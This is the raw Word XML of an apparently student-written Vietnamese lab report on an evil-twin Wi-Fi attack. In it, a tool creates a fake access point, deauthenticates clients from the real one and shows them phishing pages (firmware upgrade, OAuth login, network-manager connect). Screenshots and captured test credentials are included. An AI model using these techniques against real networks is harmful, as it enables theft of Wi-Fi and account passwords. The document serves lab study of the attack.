    <w:p w14:paraId="6648F631" w14:textId="57F8CA66" w:rsidR="00C77140" w:rsidRPr="00934D88" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00934D88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.Network Manager Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E798830" w14:textId="165A12C6" w:rsidR="00C77140" w:rsidRPr="00934D88" w:rsidRDefault="00372F13" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C77140" w:rsidRPr="00934D88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.Oauth Login Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D448A5A" w14:textId="3F3AF9D5" w:rsidR="00C77140" w:rsidRPr="00934D88" w:rsidRDefault="00372F13" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C77140" w:rsidRPr="00934D88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.Firmware Upgrade Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F3CD2B" w14:textId="400D8754" w:rsidR="00C77140" w:rsidRDefault="00C77140" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi chọn xong thì sẽ có 1 bảng hiển thị các thông tin khi đã tạo thành công fake AP thì tool này sẽ death client từ AP gốc để họ reconnect vào fakeap</w:t>
      </w:r>
      <w:r w:rsidR="00934D88">
        <w:t xml:space="preserve"> .1 bảng chọn sẽ hiển thị để chúng ta quan sát thông tin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D7835" w14:textId="0B324831" w:rsidR="00934D88" w:rsidRDefault="00934D88" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52D791F4" wp14:editId="2528041B">
            <wp:extent cx="5117123" cy="1577235"/>
            <wp:effectExtent l="0" t="0" r="7620" b="444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2471" cy="15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D3C7" w14:textId="0C81AFDE" w:rsidR="00934D88" w:rsidRDefault="00934D88" w:rsidP="002557BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đối với cách tấn công thứ </w:t>
      </w:r>
      <w:r w:rsidR="00372F13">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thì khi client connect vào fakeap thì họ sẽ được redirect đến trang có giao diện như thế này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308451D" w14:textId="364FD5EC" w:rsidR="00934D88" w:rsidRPr="00BC439C" w:rsidRDefault="007F790D" w:rsidP="002557B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E9C19" wp14:editId="7FE5A1A1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5490210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>689610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="970155" cy="2889250"/>
                <wp:effectExtent l="0" t="0" r="20955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155" cy="288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FA43A" w14:textId="6068DDC9" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
                            <w:pPr>
                              <w:ind w:firstLine="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Giao diện của client khi bị disconnect khỏi AP.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3211477B" w14:textId="59558765" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
                            <w:pPr>
                              <w:ind w:firstLine="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>NC – WPA2 là fakeap mà chúng ta tạo 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E9C19" id="Text Box 56" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:432.3pt;margin-top:54.3pt;width:76.4pt;height:22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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4B7FA43A" w14:textId="6068DDC9" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
                      <w:pPr>
                        <w:ind w:firstLine="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Giao diện của client khi bị disconnect khỏi AP.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3211477B" w14:textId="59558765" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
                      <w:pPr>
                        <w:ind w:firstLine="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>NC – WPA2 là fakeap mà chúng ta tạo ra</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00934D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02919" wp14:editId="4C14A906">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2454910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4044950" cy="3600450"/>
                <wp:effectExtent l="0" t="0" r="1270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E728E" w14:textId="555F6865" w:rsidR="00934D88" w:rsidRDefault="00934D88" w:rsidP="00934D88">
                            <w:r>
                              <w:t>Khi họ tick agree và nhập mật khẩu vào thì chúng ta sẽ có được mật khẩu wifi của ap mà chúng ta đang giả mạo</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4834CC53" w14:textId="10F41D7A" w:rsidR="00934D88" w:rsidRDefault="00934D88" w:rsidP="00934D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B81CE" wp14:editId="3A4F5CF4">
                                  <wp:extent cx="2546985" cy="3502660"/>
                                  <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
                                  <wp:docPr id="55" name="Picture 55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icture 55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6985" cy="3502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02919" id="Text Box 52" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:193.3pt;margin-top:.3pt;width:318.5pt;height:28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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3E3E728E" w14:textId="555F6865" w:rsidR="00934D88" w:rsidRDefault="00934D88" w:rsidP="00934D88">
                      <w:r>
                        <w:t>Khi họ tick agree và nhập mật khẩu vào thì chúng ta sẽ có được mật khẩu wifi của ap mà chúng ta đang giả mạo</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4834CC53" w14:textId="10F41D7A" w:rsidR="00934D88" w:rsidRDefault="00934D88" w:rsidP="00934D88">
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001B81CE" wp14:editId="3A4F5CF4">
                            <wp:extent cx="2546985" cy="3502660"/>
                            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
                            <wp:docPr id="55" name="Picture 55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icture 55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6985" cy="3502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4D88">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00934D88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="082F9AA3" wp14:editId="2151B806">
            <wp:extent cx="2322547" cy="5207000"/>
            <wp:effectExtent l="0" t="0" r="1905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0953" cy="522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61BC" w14:textId="62000914" w:rsidR="00EB0FF5" w:rsidRDefault="00934D88" w:rsidP="00EB0FF5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A5942FC" wp14:editId="451C1936">
            <wp:extent cx="6120765" cy="221869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23A6" w14:textId="27A6049F" w:rsidR="00934D88" w:rsidRDefault="00934D88" w:rsidP="00EB0FF5">
      <w:r>
        <w:t>Password là : ducquadeptrai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C1204" w14:textId="151BFD85" w:rsidR="00934D88" w:rsidRDefault="00934D88" w:rsidP="00EB0FF5"/>
    <w:p w14:paraId="6DD99787" w14:textId="51FA2E43" w:rsidR="00934D88" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tương tự với 2 cách tấn công còn lại :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD9EC1" w14:textId="77777777" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D"/>
    <w:p w14:paraId="181C8B4D" w14:textId="12F627D5" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cách </w:t>
      </w:r>
      <w:r w:rsidR="00372F13">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F790D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00934D88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Oauth Login Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9060F" w14:textId="3F8F5515" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31A327CD" wp14:editId="5B3AA230">
            <wp:extent cx="3590925" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="9525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D381" w14:textId="332A7EED" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Giao diện của client khi connect và fake AP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00542A16" w14:textId="621552C8" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="006DEC88" wp14:editId="30059AED">
            <wp:extent cx="6120765" cy="2293620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58" name="Picture 5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websit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B6F1" w14:textId="6856130C" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Giao diện của chúng ta sau khi họ nhập thông tin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49259058" w14:textId="14D78403" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Thông tin lấy được là :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF02D26" w14:textId="35848BAE" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="00010674">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>anhduc2901@facebook.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D1D02D3" w14:textId="5B80506C" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>ducvanquadeptrai:))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649A18EC" w14:textId="06BAFFD6" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF57003" w14:textId="38D6F091" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D7BD79" w14:textId="778C99C7" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F46ACA" w14:textId="26B1BF32" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C00A5A7" w14:textId="0FDFABE5" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D23AD3" w14:textId="262760D5" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FBA9D5A" w14:textId="45335498" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D412F52" w14:textId="77777777" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7369DBC2" w14:textId="53480CD0" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cách </w:t>
      </w:r>
      <w:r w:rsidR="00372F13">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidRPr="007F790D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00934D88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Manager Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7E4C4" w14:textId="5544EB25" w:rsidR="007F790D" w:rsidRDefault="007F790D" w:rsidP="007F790D">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FFDCA0D" wp14:editId="7331E08C">
            <wp:extent cx="2901950" cy="3070847"/>
            <wp:effectExtent l="0" t="0" r="0" b="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4119" cy="307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B6AC" w14:textId="6944EEB4" w:rsidR="00934D88" w:rsidRPr="00EB0FF5" w:rsidRDefault="00372F13" w:rsidP="00EB0FF5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14865D3D" wp14:editId="6206D6C7">
            <wp:extent cx="6120765" cy="2340610"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="60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D88" w:rsidRPr="00EB0FF5" w:rsidSect="00A403AA">
      <w:headerReference w:type="default" r:id="rId51"/>
      <w:footerReference w:type="default" r:id="rId52"/>
      <w:headerReference w:type="first" r:id="rId53"/>
      <w:pgSz w:w="11907" w:h="16839" w:code="9"/>
      <w:pgMar w:top="1134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2352" w14:textId="77777777" w:rsidR="007F0987" w:rsidRDefault="007F0987" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65E7FDC4" w14:textId="77777777" w:rsidR="007F0987" w:rsidRDefault="007F0987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B03B7E-DF92-490E-A7BA-CAD6ECF063E5}"/>
    <w:embedBold r:id="rId2" w:fontKey="{4A26A4B5-7667-409E-9262-D62411184CF3}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{3E0EB970-7EB0-4D90-B194-693184BC4D6D}"/>
    <w:embedBoldItalic r:id="rId4" w:fontKey="{9390A957-1D58-467A-BCCF-236308240B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B35F701C-822E-4553-9BA1-AEC55F4C0DB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A0B311D-B5F7-465F-AA82-1B7230A53AD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92A87D79-EF8C-4A57-B855-5B0B53DFAB0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893472B9-ACD8-4299-9F54-EC3D0400F6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DC5E5F1C-1433-4F50-ADB3-88F658413A28}"/>
    <w:embedBold r:id="rId10" w:fontKey="{714017CE-58B3-4A32-A0FA-3BDED9EE0D31}"/>
    <w:embedItalic r:id="rId11" w:fontKey="{6F5A498D-E3A0-4175-8161-C8A310F68392}"/>
    <w:embedBoldItalic r:id="rId12" w:fontKey="{7A981BF4-48A5-4B83-B520-48548770CF7A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4D"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800000A7" w:usb1="5000004A" w:usb2="00000000" w:usb3="00000000" w:csb0="00000111" w:csb1="00000000"/>
    <w:embedRegular r:id="rId13" w:fontKey="{E20070E2-A0CA-4705-A45C-FFB98A6B9C70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D3F6EC8F-9516-47A9-8F88-A57865CCA6C9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F9A33977-03D2-48C2-98A8-B76A3E2138E0}"/>
  </w:font>
  <w:font w:name="UTM Neo Intel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6" w:fontKey="{5C0F700D-8076-485B-A073-A2D0008A92F4}"/>
  </w:font>
  <w:font w:name="Adobe Gothic Std B">
    <w:altName w:val="Droid Sans Fallback"/>
    <w:charset w:val="80"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="0000000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7" type="#_x0000_t202" style="position:absolute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3483E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5D280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8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6BDF" w14:textId="77777777" w:rsidR="007F0987" w:rsidRDefault="007F0987" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04FC7107" w14:textId="77777777" w:rsidR="007F0987" w:rsidRDefault="007F0987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476813B" w:rsidR="00C63CCF" w:rsidRPr="00276095" w:rsidRDefault="00FA580A" w:rsidP="00FA580A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4680"/>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="left" w:pos="8222"/>
      </w:tabs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1AD61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32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3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34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5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6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76095"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="00276095" w:rsidRPr="00276095">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>XX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r w:rsidR="00276095" w:rsidRPr="00276095">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>Tên bài Lab</w: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D00F" w14:textId="693B70C9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06230"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="273475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86F48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E4005DC"/>
    <w:lvl w:ilvl="0" w:tplc="DFFAFCC4">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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A2D6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B6A8E1A"/>
    <w:lvl w:ilvl="0" w:tplc="9F5064E6">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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2774D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA24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92462">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1641569845">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="180895089">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1350139364">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1798141759">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1871188461">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="295570922">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1785617008">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1668439939">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="911432925">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2013679714">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2095468024">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1345009278">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1516265625">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="970136088">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="546571206">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1407872837">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="23528685">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="954210967">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1612279958">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="329720963">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="190068956">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="374280897">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1679623440">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1418332862">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="70662423">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="912395634">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="2069457397">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1017778767">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="926841432">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="143343071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embedSystemFonts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11B4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3C3A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6636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025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57BF"/>
    <w:rsid w:val="00256D07"/>
    <w:rsid w:val="00260392"/>
    <w:rsid w:val="002610C7"/>
    <w:rsid w:val="00261277"/>
    <w:rsid w:val="00261F27"/>
    <w:rsid w:val="00261F3E"/>
    <w:rsid w:val="00262145"/>
    <w:rsid w:val="00263448"/>
    <w:rsid w:val="002647F1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2F67D7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2F13"/>
    <w:rsid w:val="00373BFF"/>
    <w:rsid w:val="00375DC1"/>
    <w:rsid w:val="003765B7"/>
    <w:rsid w:val="00377044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7C9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294"/>
    <w:rsid w:val="003D0A0B"/>
    <w:rsid w:val="003D35CE"/>
    <w:rsid w:val="003D40F1"/>
    <w:rsid w:val="003D565F"/>
    <w:rsid w:val="003D616E"/>
    <w:rsid w:val="003D65B2"/>
    <w:rsid w:val="003E0188"/>
    <w:rsid w:val="003E311F"/>
    <w:rsid w:val="003E4901"/>
    <w:rsid w:val="003E4A15"/>
    <w:rsid w:val="003E72FD"/>
    <w:rsid w:val="003F0087"/>
    <w:rsid w:val="003F012A"/>
    <w:rsid w:val="003F02DA"/>
    <w:rsid w:val="003F0AA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CB3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C7CEB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D0A"/>
    <w:rsid w:val="00684FDC"/>
    <w:rsid w:val="00685223"/>
    <w:rsid w:val="00687768"/>
    <w:rsid w:val="00690704"/>
    <w:rsid w:val="0069077D"/>
    <w:rsid w:val="00694787"/>
    <w:rsid w:val="00694EB5"/>
    <w:rsid w:val="00695F32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49C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380F"/>
    <w:rsid w:val="007E4356"/>
    <w:rsid w:val="007E5644"/>
    <w:rsid w:val="007E6060"/>
    <w:rsid w:val="007F0987"/>
    <w:rsid w:val="007F0AB7"/>
    <w:rsid w:val="007F1F18"/>
    <w:rsid w:val="007F7113"/>
    <w:rsid w:val="007F790D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5303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1DCD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4D8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7793A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199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2289"/>
    <w:rsid w:val="00AC384C"/>
    <w:rsid w:val="00AC5813"/>
    <w:rsid w:val="00AC6B3E"/>
    <w:rsid w:val="00AD01D8"/>
    <w:rsid w:val="00AD1DB8"/>
    <w:rsid w:val="00AD3351"/>
    <w:rsid w:val="00AD7B09"/>
    <w:rsid w:val="00AE0A9B"/>
    <w:rsid w:val="00AE28FE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D6A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39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140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1DC6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40C0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6983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6CA4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22E6D"/>
    <w:rsid w:val="00E24066"/>
    <w:rsid w:val="00E245AA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A1C"/>
    <w:rsid w:val="00E95D5E"/>
    <w:rsid w:val="00E96E44"/>
    <w:rsid w:val="00EA0151"/>
    <w:rsid w:val="00EA06E1"/>
    <w:rsid w:val="00EA0D84"/>
    <w:rsid w:val="00EA29A2"/>
    <w:rsid w:val="00EA2CAF"/>
    <w:rsid w:val="00EA4661"/>
    <w:rsid w:val="00EA5568"/>
    <w:rsid w:val="00EA56BA"/>
    <w:rsid w:val="00EA77C2"/>
    <w:rsid w:val="00EB0FF5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5F4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085A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958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D7702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098"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:firstLine="567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06CB3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr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06CB3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="60"/>
      <w:contextualSpacing w:val="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
      <w:b/>
      <w:color w:val="DD2C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8F1DCD"/>
    <w:pPr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rFonts w:ascii="UTM Avo" w:hAnsi="UTM Av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6CB3"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:color w:val="DD2C00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8F1DCD"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b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Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00E245AA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="007649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79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cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip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mailto:anhduc2901@facebook.com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7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oàng Đức</cp:lastModifiedBy>
  <cp:revision>63</cp:revision>
  <cp:lastPrinted>2019-03-26T14:54:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-24T06:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-26T05:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>